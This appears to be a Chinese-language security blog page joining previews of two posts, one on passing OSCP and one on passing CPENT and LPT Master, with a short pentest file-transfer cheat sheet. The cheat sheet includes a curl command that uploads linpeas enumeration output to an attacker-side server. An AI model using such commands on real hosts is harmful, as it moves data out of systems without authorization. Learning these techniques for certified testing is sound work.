前言 歷經 4 個月的努力，成功在今年 7 月考取 OSCP 認證，因此想透過此篇心得分享幫助正在準備或者是計劃考取 OSCP 認證的朋友。 個人背景 任職於資安代理商約 5 年，目前從事 MDR 二線分析工作，因為工作經歷有接觸網通設備(Firewall,WLAN)，所以在網路概念有一定基礎 ; 至於在駭客攻防（紅隊）領域，則在工作上比較不會用到，但因為本身有興趣，所以有自行學習相關知識與考取一些認證，如：CEH , CPENT / LPT Master。 OSCP 證照簡介 關於 Offensive Security (Offsec) 課程類別與定位，可以參考下方圖片 https://www.offsec.com/courses/pen-200/

前言 本人在 2022.11 成功考取 EC-Council CPENTv1 與 LPT Master 認證，在此分享整個準備的心路歷程，提供給有規劃報考此認證的朋友一些建議與方向;此篇分享的重點不會過度著重在技術細節，而是會著重在如何備考,考試過程...等。 個人背景 考取證照當時25歲，任職於資安產品代理商，擔任工程師約 4+ 年，本身因為工作會接觸到網通相關產品(如：防火牆,Switch,Wireless)，所以對網路知識已經具備一定的基礎，至於滲透相關的知識，因為不是職務內容，所以在工作上幾乎不會接觸到，主要都是以藍軍偵測,防禦,鑑識相關的產品為主(EDR,NDR)，但因為本身對於駭客攻防這塊領域具有興趣，因此還是會利用一些線上資源來做學習，在考取此認證之前，已經有先取得 CCNA,CEH,CHFI 認證，因此在報考CPENT時，是抱持著完成EC-Council最後一塊拼圖的心態來進行。 認證簡介 EC-Council CPENT CPENT 為 EC-Council 紅隊最高階的證照課程，為之前 ECSAv10 改版後的證照課程，CPENT的考試過程是全程線上實作，注重實務技巧，並且全程人員監考，可以參考下方 EC-Council 原廠提供的路線圖。 https://www.eccouncil.org/vapt-career-path/

HTTP Server For Download Files python3 -m http.server 80 For Download / Upload Files Server: python3 -m uploadserver 80 Client: curl -X POST -F files=@linpeas.output http://192.168.1.200/upload FTP Server